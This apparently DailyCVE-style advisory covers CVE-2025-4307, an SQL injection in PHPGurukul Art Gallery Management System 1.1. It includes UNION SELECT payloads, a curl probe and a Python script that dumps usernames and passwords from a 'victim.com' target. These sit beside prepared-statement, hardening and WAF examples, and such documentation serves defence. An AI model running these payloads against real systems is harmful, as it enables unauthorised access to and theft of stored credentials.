How CVE-2025-4307 Works
The vulnerability exists in the `/admin/add-art-medium.php` file of PHPGurukul Art Gallery Management System 1.1. The `artmed` parameter is improperly sanitized before being used in SQL queries, allowing attackers to inject malicious SQL commands. When crafted input is submitted through this parameter, the backend database executes unintended commands, potentially enabling unauthorized data access, modification, or deletion. The attack can be performed remotely without authentication due to insufficient access controls. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) indicates network-based exploitation with low attack complexity and no privileges required.
DailyCVE Form
Platform: PHPGurukul CMS
Version: 1.1
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-05-05
What Undercode Say:
```sql
-- Exploit POC
1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-- -
```
```php
// Protection Code
// $conn is the application's existing mysqli connection.
$artmed = mysqli_real_escape_string($conn, $_POST['artmed']);
$query = "INSERT INTO mediums (medium_name) VALUES ('$artmed')";
```
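A parameterized form of the insert next to the concatenated form it replaces, as an added example (not PHPGurukul's code and not from the advisory). It assumes PDO with an in-memory SQLite database standing in for the application's MySQL connection; the function names, the 100-character limit and the sample input are constructed for illustration.

```php
<?php
declare(strict_types=1);
// Added example: PDO + in-memory SQLite stand in for the app's MySQL
// connection (assumption). Table/column names follow the snippet above;
// function names, the length limit and the input are hypothetical.

function newDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE mediums (id INTEGER PRIMARY KEY, medium_name TEXT NOT NULL)');
    return $db;
}

// Before: the value is pasted into the SQL text, so a quote inside it
// ends the string literal and the rest is parsed as SQL.
function addMediumConcatenated(PDO $db, string $artmed): void {
    $db->exec("INSERT INTO mediums (medium_name) VALUES ('$artmed')");
}

// After: validate, then bind. The value travels as data and is never
// parsed as part of the statement.
function addMediumPrepared(PDO $db, string $artmed): bool {
    $artmed = trim($artmed);
    if ($artmed === '' || strlen($artmed) > 100) { // hypothetical limit
        return false;
    }
    $stmt = $db->prepare('INSERT INTO mediums (medium_name) VALUES (:name)');
    return $stmt->execute([':name' => $artmed]);
}

function storedNames(PDO $db): array {
    return $db->query('SELECT medium_name FROM mediums ORDER BY id')
              ->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed input that closes the literal and appends a second row.
$input = "Oil'), ('injected-row";

$before = newDb();
addMediumConcatenated($before, $input);
printf("concatenated: %d row(s) stored\n", count(storedNames($before)));

$after = newDb();
addMediumPrepared($after, $input);
printf("prepared:     %d row(s) stored\n", count(storedNames($after)));
```

On a mysqli connection the same pattern is `$conn->prepare(...)` followed by `bind_param('s', $artmed)` and `execute()`.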
```bash
# Detection Command
curl -X POST "http://target/admin/add-art-medium.php" -d "artmed=1'" | grep "SQL syntax"
```
```python
# Automated Exploit Script
import requests

target = "http://victim.com/admin/add-art-medium.php"
payload = {"artmed": "1' UNION SELECT username,password,3 FROM users-- -"}
r = requests.post(target, data=payload)
print(r.text)
```
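```sql
-- Database Hardening
REVOKE ALL PRIVILEGES ON *.* FROM 'gallery_user'@'%';
-- A SELECT-only account cannot run the INSERT that add-art-medium.php issues;
-- grant INSERT on the specific tables the admin pages write to if that is needed.
GRANT SELECT ON gallery_db.* TO 'gallery_user'@'localhost';
```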
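```nginx
# WAF Rule
# $query_string holds only the URL query; the artmed value is sent in the
# POST body, so this rule does not inspect it.
location /admin/ {
    set $block_sql_inject 0;
    if ($query_string ~* "union.*select") {
        set $block_sql_inject 1;
    }
    if ($block_sql_inject = 1) {
        return 403;
    }
}
```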
Sources:
Reported By: nvd.nist.gov